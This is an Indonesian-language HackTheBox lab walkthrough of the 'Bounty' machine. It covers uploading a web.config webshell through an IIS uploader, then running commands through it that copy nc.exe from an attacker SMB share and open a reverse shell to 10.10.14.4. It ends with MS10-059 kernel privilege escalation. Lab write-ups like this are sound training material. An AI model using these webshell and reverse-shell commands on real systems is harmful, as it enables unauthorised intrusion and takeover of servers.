HACKTHEBOX WALKTROUGH

Bounty Machines

CVE-CWE N/A (Without Metasploit)

Trimakasih sudah meluangkan waktu untuk membaca artikel ini. Saat ini penulis menghadapi mesin retired HTB “Bounty” yang dimana total ada 72 mesin retired setelah penulis memperbarui list target penulis yang terdapat pada list netsecfocus, dan penulis akan menempuh list target tersebut dan di dokumentasikan di akun medium ini.

Semoga pembaca semakin diberkahi dan ditingkatkan keilmuannya, serta selalu tercapai setiap tujuan dan cita-citanya atas Kehendak-Nya, juga yang sedang menempuh sertifikasi OSCP semoga tercapai dan sukses total, Aamiin. Full list mesin retired HTB oleh netsecfocus dapat di akses disini.

Reconnaissance

Dimulai dengan melakukan reconnaissance menggunakan nmap.

80/tcp open  http    Microsoft IIS httpd 7.5

Disaat penulis melakukan reconnaissance menggunakan nmapAutomator, penulis hanya mendapatkan result bahwa hanya port 80 yang terbuka pada server target.

http://10.10.10.93:80/aspnet_client (Status: 301) [Size: 159]
http://10.10.10.93:80/uploadedfiles (Status: 301) [Size: 159]

Kemudian pada service tersebut dilakukan crawling directory dan file menggunakan gobuster dan ditemukan bahwa terdapat 2 direktori yang ditemukan yaitu direktori “aspnet_client” dan “uploadedfiles”.

Enumeration

Berikut tampilan ketika penulis melakukan akses terhadap address 10.10.10.93 melalui firefox browser.

Gambar 1

Kemudian penulis melakukan pencarian direktori dan file lagi menggunakan dirbuster juga untuk mencari file dengan extension (*.aspx).

Gambar 2

Kemudian ditemukan file transfer.aspx terdapat pada situs target.

Kemudian penulis melakukan akses terhadap file tersebut di url http://10.10.10.93/transfer.aspx

Gambar 3

Dimana seperti ditemukan pada Gambar 3 bahwa file transfer.aspx merupakan uploader. Kemudian penulis menindak lanjuti dengan melakukan upload webshell.config dengan nama webshell “web.config”

Setelah berhasil webshell “web.config” di upload, penulis melanjuti dengan melakukan akses terhadap webshell yang sudah di upload di url http://10.10.10.93/uploadedfiles/web.config?cmd=dir .

Gambar 4

Seperti terlihat di Gambar 4 bahwa webshell “web.config” berhasil di upload dan berjalan normal, pada bagian ini penulis sudah mendapatkan initial foothold.

Initial Shell

Setelah penulis mendapatkan initial foothold, penulis melanjutkan di tahap selanjutnya untuk mendapatkan shell di terminal penulis. Untuk mendapatkan shell, penulis akan mendapatkannya menggunakan metode reverse shell, dan reverse shell akan berjalan dengan ncat.

Sebelum melakukan reverse shell, penulis hanya perlu melakukan upload ncat dengan nama file nc.exe kedalam server target melalui service python smb server.

Gambar 5

Setelah pada direktori tempat nc.exe penulis menjalankan python smb server, kemudian penulis melanjutkan dengan melakukan copy file nc.exe kedalam server target melalui webshell “web.config”

http://10.10.10.93/uploadedfiles/web.config?cmd=copy%20\\10.10.14.4\kcrt\nc.exe%20c:\Windows\Temp\nc.exe

Lalu penulis hanya perlu menjalankan nc.exe yang sudah terdapat pada server target dengan perintah :

10.10.10.93/uploadedfiles/web.config?cmd=c:\Windows\Temp\nc.exe 10.10.14.4 777 -e cmd

Kemudian di terminal penulis sebelumnya menjalankan ncat sebagai listener pada port 777.

Gambar 6

Penulis sudah mendapatkan initial shell.

Privilege Escalation

Pada bagian ini, penulis akan melakukan privilege escalation dengan metode windows kernel exploit. Sebelum melakukan hal tersebut, penulis perlu melihat informasi yang terdapat pada systeminfo yang kemudian di pelajari oleh windows-exploit-suggester.py apakah ada bagian yang belum di patch dan dapat dijadikan jalan untuk dilakukan privilege escalation melalui metode windows kernel exploit.

systeminfo

Gambar 7

Lalu penulis menyimpan result dari systeminfo yang didapat dari server target kemudian dilakukan pencarian exploit windows kernel yang paling sesuai dengan windows-exploit-suggester.py.

# python windows-exploit-suggester.py --database 2020-10-19-mssb.xls --systeminfo Bounty.txt

Gambar 8

Yapp, terdapat kemungkinan bahwa server target bisa dilakukan windows kernel exploit “MS10–059”.

Lalu penulis hanya perlu memindahkan file exploit MS10–059.exe kedalam server target melalui python smb server.

copy \\10.10.14.4\kcrt\MS10-059.exe MS10-059.exe

Gambar 9

Kemudian penulis hanya perlu menjalankan reverse shell menggunakan file exploit MS10–059.exe .

Gambar 10

Penulis mendapatkan sesi Administrator.

Kesimpulan

Pada bagian ini penulis melatih sense untuk melakukan pencarian file berdasarkan kemungkinan extension yang biasa di gunakan dalam suatu services dalam hal ini yaitu IIS 7.5

Target

46 mesin lagi !